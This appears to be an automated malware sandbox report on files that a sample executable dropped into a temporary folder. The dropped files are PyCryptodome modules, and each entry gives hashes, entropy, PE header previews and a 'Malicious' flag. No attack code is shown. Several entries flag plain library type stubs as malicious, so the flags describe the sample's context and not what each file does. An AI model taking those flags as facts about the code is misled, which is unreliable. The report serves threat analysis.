                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d...B..e.........." ...%.0..........P.....................................................`..........................................H.......I..d....p.......`..X...............,....C...............................A..@............@...............................text..../.......0.................. ..`.rdata.......@.......4..............@..@.data........P.......B..............@....pdata..X....`.......D..............@..@.rsrc........p.......H..............@..@.reloc..,............J..............@..B................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_SHA224.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):22016
                                                                                                                                            Entropy (8bit):5.86552932624144
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:V1jwGPJHLvzcY1EEerju9LcTZ6RO3RouLKtcyDNOhwgjxo:XjwyJUYToZwOLuzDNU1j
                                                                                                                                            MD5:92587A131875FF7DC137AA6195B8BD81
                                                                                                                                            SHA1:2BA642DDC869AB329893795704BFE3F23C7B6ECB
                                                                                                                                            SHA-256:D2A9484134A65EFF74F0BDA9BB94E19C4964B6C323667D68B4F45BB8A7D499FC
                                                                                                                                            SHA-512:62823A0168B415045A093ACC67E98B5E33908380860B04AA0568B04F39DE957DA30F929459C766DC9782EFC3143DCD2F4950E3876669E680B6910C213300B565
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d...F..e.........." ...%.8... ......P.....................................................`..........................................Z.......[..d............p..................,... T...............................R..@............P...............................text....6.......8.................. ..`.rdata.......P.......<..............@..@.data........`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..,............T..............@..B................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_SHA256.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):22016
                                                                                                                                            Entropy (8bit):5.867427817795374
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:b1jwGPJHLxzcY1EEerju9LcTZ6RO3RouLKtcyDNWegjxo:ZjwyJOYToZwOLuzDNW7j
                                                                                                                                            MD5:B4E18C9A88A241FD5136FAF33FB9C96A
                                                                                                                                            SHA1:077AF274AA0336880391E2F38C873A72BFC1DE3B
                                                                                                                                            SHA-256:E50DB07E18CB84827B0D55C7183CF580FB809673BCAFBCEF60E83B4899F3AA74
                                                                                                                                            SHA-512:81A059115627025A7BBF8743B48031619C13A513446B0D035AA25037E03B6A544E013CAAEB139B1BE9BA7D0D8CF28A5E7D4CD1B8E17948830E75BDFBD6AF1653
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d...D..e.........." ...%.8... ......P.....................................................`..........................................Z.......[..d............p..................,... T...............................R..@............P...............................text....6.......8.................. ..`.rdata.......P.......<..............@..@.data........`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..,............T..............@..B................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_SHA384.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):27136
                                                                                                                                            Entropy (8bit):5.860145427724178
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:TFDL3RqE3MjjQ95UnLa+1WT1aA7qHofg5JptfISH2mDDFfgjVx2:xDLh98jjRe+1WT1aAeIfMzxH2mDDqj
                                                                                                                                            MD5:34A0AD8A0EB6AC1E86DC8629944448ED
                                                                                                                                            SHA1:EF54E4C92C123BE341567A0ACC17E4CEE7B9F7A8
                                                                                                                                            SHA-256:03E93C2DCC19C3A0CDD4E8EFCDE90C97F6A819DFECF1C96495FDC7A0735FAA97
                                                                                                                                            SHA-512:A38EDE4B46DC9EFA80DFB6E019379809DF78A671F782660CD778427482B0F5987FA80A42C26FB367604BAFCD4FD21ABD1C833DAF2D4AEA3A43877F54D6906E21
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d...G..e.........." ...%.J..."......P.....................................................`......................................... l.......m..d...............................,....e...............................d..@............`...............................text...hH.......J.................. ..`.rdata..X....`.......N..............@..@.data................`..............@....pdata...............b..............@..@.rsrc................f..............@..@.reloc..,............h..............@..B................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_SHA512.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):27136
                                                                                                                                            Entropy (8bit):5.916758045478156
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:LFYLXRqEnMgj969GUnLa+1WT1aA7qHofg5JptfIS320DXCElrgjhig:5YLB9Mgj0e+1WT1aAeIfMzx320DXR+j
                                                                                                                                            MD5:F028511CD5F2F925FD5A979152466CB4
                                                                                                                                            SHA1:38B8B44089B390E1F3AA952C950BDBE2CB69FBA5
                                                                                                                                            SHA-256:0FB591416CC9520C6D9C398E1EDF4B7DA412F80114F80628F84E9D4D37A64F69
                                                                                                                                            SHA-512:97C06A4DCEE7F05268D0A47F88424E28B063807FFBD94DABDCC3BF773AD933A549934916EB7339506624E97829AA5DC13321ADE31D528E8424FFDCF8C8407D4F
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d...I..e.........." ...%.J..."......P.....................................................`..........................................l.......m..d...............................,...@f...............................e..@............`...............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data................`..............@....pdata...............b..............@..@.rsrc................f..............@..@.reloc..,............h..............@..B................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\__init__.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2694
                                                                                                                                            Entropy (8bit):5.462749746031335
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:5KwpHd7fl2L+JB/CZGDGYGwgmkRpZev32Wsfcocococ/wfPPyLGMQ:BHd7Co3GBWvZsW/Q
                                                                                                                                            MD5:B70A862ABCDB8A27D1A270EDB80FF4E5
                                                                                                                                            SHA1:D3E9CD78DE4255A3FE8AD3803472012CE4E43189
                                                                                                                                            SHA-256:FDD450E0E8D8356D6D1FCDA1023543D0D69771DA94A9B865CF38CABA6C657725
                                                                                                                                            SHA-512:6FBCC7AC9174A591EC89BEFA2C2B7DEFC9C03D21348662CDA34648B595DD5A08B26E682975E185E8D3868C5B113DB1FDA4F86A19C3EEF082F56350D996C1D8CD
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e................................g.d...Z.d...Z.d.S.).)...HMAC..MD2..MD4..MD5..RIPEMD160..SHA1..SHA224..SHA256..SHA384..SHA512..SHA3_224..SHA3_256..SHA3_384..SHA3_512..CMAC..Poly1305..cSHAKE128..cSHAKE256..KMAC128..KMAC256..TupleHash128..TupleHash256..KangarooTwelve..TurboSHAKE128..TurboSHAKE256c...........................|.....................................}.|.d.v.r.d.d.l.m.}...|.....................................S.|.d.v.r.d.d.l.m.}...|.....................................S.|.d.v.r.d.d.l.m.}...|.....................................S.|.d.v.r.d.d.l.m.}...|.....................................S.|.d.v.r.d.d.l.m.}...|.....................................S.|.d.v.r.d.d.l.m.}...|.......................d.................S.|.d.v.r.d.d.l.m.}...|.......................d.................S.|.d.v.r.d.d.l.m.}...|.....................................S.|.d.v.r.d.d.l.m.}...|.....................................S.|.d.v.r.d.d.l.m.}...|.....................................S.|.d.v.r.d.d.l.m.}.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\__init__.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2121
                                                                                                                                            Entropy (8bit):5.171713375007499
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:aF98+zvvpZuaWt1tZccj8ny7Mk8kjqu5BCViGHh29398O4Q:aF9fzvvfuaWJZccj8ny7Mk8kjqu5BCVO
                                                                                                                                            MD5:370A72919209A9DA24ED470170C6094B
                                                                                                                                            SHA1:956F71EBA4FD2B7DE4B87A7844803A0654F24E3F
                                                                                                                                            SHA-256:B8A157C035F24A8E3C29E5FF77C39836C4FDE12B7D6EBE30CB2207B565DA2B5C
                                                                                                                                            SHA-512:95E90FE1AB7BCD74B1082BAC45017BEE02CFE172CF13D0440D7B2134C314C1CD535CFF3F42BDA83E73896AD358A486D17BDFD45D2F4643505077A99B6D2E50B3
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import overload..from typing_extensions import Literal....from Cryptodome.Hash.SHA1 import SHA1Hash..from Cryptodome.Hash.SHA224 import SHA224Hash..from Cryptodome.Hash.SHA256 import SHA256Hash..from Cryptodome.Hash.SHA384 import SHA384Hash..from Cryptodome.Hash.SHA512 import SHA512Hash..from Cryptodome.Hash.SHA3_224 import SHA3_224_Hash..from Cryptodome.Hash.SHA3_256 import SHA3_256_Hash..from Cryptodome.Hash.SHA3_384 import SHA3_384_Hash..from Cryptodome.Hash.SHA3_512 import SHA3_512_Hash....@overload..def new(name: Literal["1.3.14.3.2.26"]) -> SHA1Hash: .....@overload..def new(name: Literal["SHA1"]) -> SHA1Hash: .....@overload..def new(name: Literal["2.16.840.1.101.3.4.2.4"]) -> SHA224Hash: .....@overload..def new(name: Literal["SHA224"]) -> SHA224Hash: .....@overload..def new(name: Literal["2.16.840.1.101.3.4.2.1"]) -> SHA256Hash: .....@overload..def new(name: Literal["SHA256"]) -> SHA256Hash: .....@overload..def new(name: Literal["2.16.840.1.101.3.4.2.2"]) -> SHA384Has

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_ghash_clmul.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12800
                                                                                                                                            Entropy (8bit):5.0002940201841
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:Dz/RF/1nb2mhQtk4axusjfkgZhoYDQmRjcqgQvEty:Dz/d2f64axnTTz5DTgQvEty
                                                                                                                                            MD5:87C1C89CEB6DF9F62A8F384474D27A4A
                                                                                                                                            SHA1:B0FC912A8DE5D9C18F603CD25AE3642185FFFBDD
                                                                                                                                            SHA-256:D2256A5F1D3DC6AE38B73EA2DB87735724D29CB400D00D74CF8D012E30903151
                                                                                                                                            SHA-512:C7DFB9C8E4F4AA984416BC84E829F0BB6CD87829C86BA259EE2A9BAB7C16B15362DB9EC87BF2ACED44A6BED7B1DE03DC9450665D083205B4CD4780DCF480DA01
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*b..*b..*b..R...*b..Uc..*b.Rc..*b..*c..*b..Ug..*b..Uf..*b..Ua..*b..j..*b..b..*b....*b..`..*b.Rich.*b.................PE..d...K..e.........." ...%............P.....................................................`..........................................8......89..d....`.......P...............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......(..............@....pdata.......P.......*..............@..@.rsrc........`......................@..@.reloc..,....p.......0..............@..B................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_ghash_portable.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13312
                                                                                                                                            Entropy (8bit):5.025717576776578
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:FF/1nb2mhQtks0iiNqdF4mtPjD0HA5APYcqgYvEL2x:R2f6fFA/4GjDucgYvEL2x
                                                                                                                                            MD5:20702216CDA3F967DF5C71FCE8B9B36F
                                                                                                                                            SHA1:4D9A814EE2941A175BC41F21283899D05831B488
                                                                                                                                            SHA-256:3F73F9D59EB028B7F17815A088CEB59A66D6784FEEF42F2DA08DD07DF917DD86
                                                                                                                                            SHA-512:0802CF05DAD26E6C5575BBECB419AF6C66E48ED878F4E18E9CEC4F78D6358D751D41D1F0CCB86770A46510B993B70D2B320675422A6620CE9843E2E42193DCD8
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d...K..e.........." ...%............P.....................................................`..........................................8......h9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......*..............@....pdata..X....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_keccak.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):16384
                                                                                                                                            Entropy (8bit):5.235441330454107
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:VTRgffnRaNfBj9xih1LPK73jm6AXiN4rSRIh42gD/gvrjcqgCieT3WQ:VafgNpj9cHW3jqXeBRamD4ZgCieT
                                                                                                                                            MD5:F065FFB04F6CB9CDB149F3C66BC00216
                                                                                                                                            SHA1:B2BC4AF8A3E06255BAB15D1A8CF4A577523B03B6
                                                                                                                                            SHA-256:E263D7E722EC5200E219D6C7D8B7C1B18F923E103C44A0B5485436F7B778B7BD
                                                                                                                                            SHA-512:93E583B10D0F2BBB1D5539FF4E943A65BC67F6DFC51E5F991481574F58757F4D49A87022E551069F6FC55D690F7B1412CF5DE7DD9BEE27FB826853CE9ACC2B40
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d...J..e.........." ...%."... ......P.....................................................`.........................................`I......TJ..d....p.......`..p...............,....C...............................B..@............@...............................text...(!.......".................. ..`.rdata.......@.......&..............@..@.data........P.......6..............@....pdata..p....`.......8..............@..@.rsrc........p.......<..............@..@.reloc..,............>..............@..B................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_poly1305.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15360
                                                                                                                                            Entropy (8bit):5.133851517560629
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:zZNGXEgvUh43G6coX2SSwmPL4V7wTdDlDaY2cqgWjvE:mVMhuGGF2L4STdDEYWgWjvE
                                                                                                                                            MD5:213AAEC146F365D950014D7FFF381B06
                                                                                                                                            SHA1:66FCD49E5B2278CD670367A4AC6704A59AE82B50
                                                                                                                                            SHA-256:CAF315A9353B2306880A58ECC5A1710BFE3AA35CFEAD7CF0528CAEE4A0629EAD
                                                                                                                                            SHA-512:0880D7D2B2C936A4B85E6C2A127B3509B76DB4751A3D8A7BB903229CABC8DE7A7F52888D67C886F606E21400DFC51C215D1CF9C976EB558EA70975412840883A
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d...K..e.........." ...%..... ......P.....................................................`......................................... 9.......9..d....`.......P..|............p..,....3...............................1..@............0...............................text...X........................... ..`.rdata..(....0......."..............@..@.data........@.......2..............@....pdata..|....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..,....p.......:..............@..B................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\cSHAKE128.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):513
                                                                                                                                            Entropy (8bit):4.65254840298011
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB3vIY3AJ1ApWaN5hFeLBaFeLsQwWh72CX5AJaNi4Y:1REcT34A1N56Vp7h71GENiL
                                                                                                                                            MD5:650178B2B4C1BBE35CB633D193929B0B
                                                                                                                                            SHA1:08A93F8C458ED63BB136821EF52ADF04B70C02A8
                                                                                                                                            SHA-256:996DE23B6A41D7158B3C0DD8B3DE5DE532F6953706640866CBE19243A882F3A3
                                                                                                                                            SHA-512:628B50274BDFA31ABCA9D06A433C493C0953C3F8BBB4949BC83EBF370F383F182D80DAF12850388F0B0EB0D989A6CA3E34329CFF9FB8051F4E649DA6F47B8C3E
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class cSHAKE_XOF(object):.. def __init__(self,.. data: Optional[Buffer] = ...,.. function: Optional[bytes] = ...,.. custom: Optional[bytes] = ...) -> None: ..... def update(self, data: Buffer) -> cSHAKE_XOF: ..... def read(self, length: int) -> bytes: .......def new(data: Optional[Buffer] = ...,.. custom: Optional[Buffer] = ...) -> cSHAKE_XOF: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\cSHAKE256.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):243
                                                                                                                                            Entropy (8bit):5.025929082655644
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:1REYBXy1kwQORyoczrIY3MTDyJaNyRD4JRQ:1REYBCk5FHvIY3YyJaNi4Y
                                                                                                                                            MD5:B419DCDBEE755F0B775F7CA84AC2C4F2
                                                                                                                                            SHA1:0AFA02C4AC01B3CBD27E24105AED4EB9F6553889
                                                                                                                                            SHA-256:5DA57A092D8D896CE5D295D7DD69D56B6EF1E4AA38294346F7EA0A6FDC56AEF2
                                                                                                                                            SHA-512:E70A94DA054A7DEB6ECB6F877BE8D798DEE8614864759364F4AF3BA7F1A67218C699F1BDCEEB41693A28178266DA10E3370F8704A7EAB79F702EE73184EC06C7
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional....from Cryptodome.Hash.cSHAKE128 import cSHAKE_XOF....Buffer = Union[bytes, bytearray, memoryview]....def new(data: Optional[Buffer] = ...,.. custom: Optional[Buffer] = ...) -> cSHAKE_XOF: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\keccak.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7860
                                                                                                                                            Entropy (8bit):5.277294583519957
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:7QVykvuFz0Z5E7QYp9dtLTH0Ger1EwIMmsyl5wRoLBviRlTPMnDHvYKW:77LlrB+YMmsyDwRmGTPGDHAKW
                                                                                                                                            MD5:B7814443F54CC8B84396FA35CD8190C2
                                                                                                                                            SHA1:05E522837855122D3144A8D6D8DDB3C6D78C6D65
                                                                                                                                            SHA-256:84316E25C90AC3CD96701AB806A8ECF5716E5BA7390CDEDAF4353339C5C9150D
                                                                                                                                            SHA-512:B4528A0BFEB80AAEA4664084239E749646AB060828125EA10BED3636B6C4FF7ADE5A413FC1B4EB43C378DF5D6D475009FC66A5FF8F732F36E05AA0866AD8AA11
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e8.........................t.....d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d...Z.d.S.)..........bord)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptr..c_ubytez.Cryptodome.Hash._keccaka..... int keccak_init(void **state,. size_t capacity_bytes,. uint8_t rounds);. int keccak_destroy(void *state);. int keccak_absorb(void *state,. const uint8_t *in,. size_t len);. int keccak_squeeze(const void *state,. uint8_t *out,. size_t len,. uint8_t padding);. int kecca

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\keccak.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):764
                                                                                                                                            Entropy (8bit):4.362163899247177
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBhvIY3PHpRyD1Ap1uw+z65JX3LBq3v37lz04LBK3P3blzO:1REYT3v/IALWz6LLBkPhz04LBEvBzO
                                                                                                                                            MD5:0A2310BA7677F27E22A421132A86D382
                                                                                                                                            SHA1:A976C8749DEE4E295DD8C808E2A7A47922E86BB4
                                                                                                                                            SHA-256:3A1DB3E7321EFB30C4AAF0FAD5728728C7AADCEBBBE91E4272940DB1F9A677F9
                                                                                                                                            SHA-512:6526BCDFF7B41EB7E94F83A2E1A770D6216E4C575410E8689C7119F6A53170CAA5B2F8AED037EB5AB40C7CA361C2E7208BF3F19C69D8E619150A1C68779FE22C
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Any....Buffer = Union[bytes, bytearray, memoryview]....class Keccak_Hash(object):.. digest_size: int.. def __init__(self,.. data: Buffer,.. digest_bytes: int,.. update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> Keccak_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def new(self,.. data: Buffer = ...,.. digest_bytes: int = ...,.. digest_bits: int = ...,.. update_after_digest: bool = ...) -> Keccak_Hash: .......def new(data: Buffer = ...,.. digest_bytes: int = ...,.. digest_bits: int = ...,.. update_after_digest: bool = ...) -> Keccak_Hash: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\IO\PEM.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):313
                                                                                                                                            Entropy (8bit):4.63314311726341
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:1REYBbAmV4uDbIBFeLBysOZ4fJEBd1pHWERrBFeLsEiJos:1REYBbr+uWFeLB/OifJEjv2EDFeLsEi5
                                                                                                                                            MD5:107D6CC5B80CF3E12D074590F5D47AE5
                                                                                                                                            SHA1:E89B8FCF239CD49A0CFC3D7561C783EA63E2FD19
                                                                                                                                            SHA-256:FD17DE9B1D9EEB3950223BE5E5B16A8CA3EE0A7E4822557F0B882BFF3D67A1D0
                                                                                                                                            SHA-512:B6E46F3846AFB5E59C5C6C1454FEEEC7FDAA01665F811BFE5338035A5D34CE16347F58EE9921118BEE11D73DE9A5CC56B2B5CC5257EF406D90E495DE3F0C0435
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Tuple, Optional, Callable....def encode(data: bytes,.. marke: str,... passphrase: Optional[bytes] = ...,... randfunc: Optional[Callable[[int],bytes]] = ...) -> str: .........def decode(pem_data: str,.. passphrase: Optional[bytes] = ...) -> Tuple[bytes, str, bool]: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\IO\PKCS8.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):625
                                                                                                                                            Entropy (8bit):4.78655012770183
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBbr0mRE1BWSkhUekAvjJMmxKxoIiNLojqyW38RJifJEvP5peYmrEidkLvFye:1REAYmC1X4RJMme4Loey1RMEnzurA/
                                                                                                                                            MD5:4EC2FE876B8F8B970CC897F91F28413F
                                                                                                                                            SHA1:E925613B314EA8285553CDC532F9F53BF9DFC3B8
                                                                                                                                            SHA-256:FAD405161C2DC747135241B41988E65295D43B7F3F971FCCFC8B76D634C7D144
                                                                                                                                            SHA-512:BB2DC865D3567C409F0EFA2EF0FE90C13B8825628CEFAA07CC8DAD7D8AC6A8E6F4C84C308E71AB23FBD14E2E9B9A77A592870275E8DFD56D15547C68BAED14A7
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Tuple, Optional, Union, Callable..from typing_extensions import NotRequired....from Cryptodome.Util.asn1 import DerObject..from Cryptodome.IO._PBES import ProtParams......def wrap(private_key: bytes,.. key_oid: str,.. passphrase: Union[bytes, str] = ...,.. protection: str = ...,.. prot_params: Optional[ProtParams] = ...,.. key_params: Optional[DerObject] = ...,.. randfunc: Optional[Callable[[int], str]] = ...) -> bytes: .........def unwrap(p8_private_key: bytes, passphrase: Optional[Union[bytes, str]] = ...) -> Tuple[str, bytes, Optional[bytes]]: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\IO\_PBES.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):781
                                                                                                                                            Entropy (8bit):4.711755021635503
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBrqRE1BWIWK+li56EotVepVnKqYjqytJifJEjP51K+lEhB5q:1REBC1WK+cH+mnKLeytMErDK+KQ
                                                                                                                                            MD5:104D32B3D75141B0546625AC5336C1EC
                                                                                                                                            SHA1:BDF345B0EBE5DC7E238D79FBD5FD63362C561195
                                                                                                                                            SHA-256:816463C1012174C626FDF286098D851BF55E201879FE9DEEADF777FD1CEA0794
                                                                                                                                            SHA-512:70AA3BEDD20562702462F69EF3209DF71C1CBDA73BDDDA451E7A2B490095AA1FEDEA4D7093BB8DB955148396A7F28BA9E7D8AC0B1B4644E4F252DED8A780A633
                                                                                                                                            Malicious:true
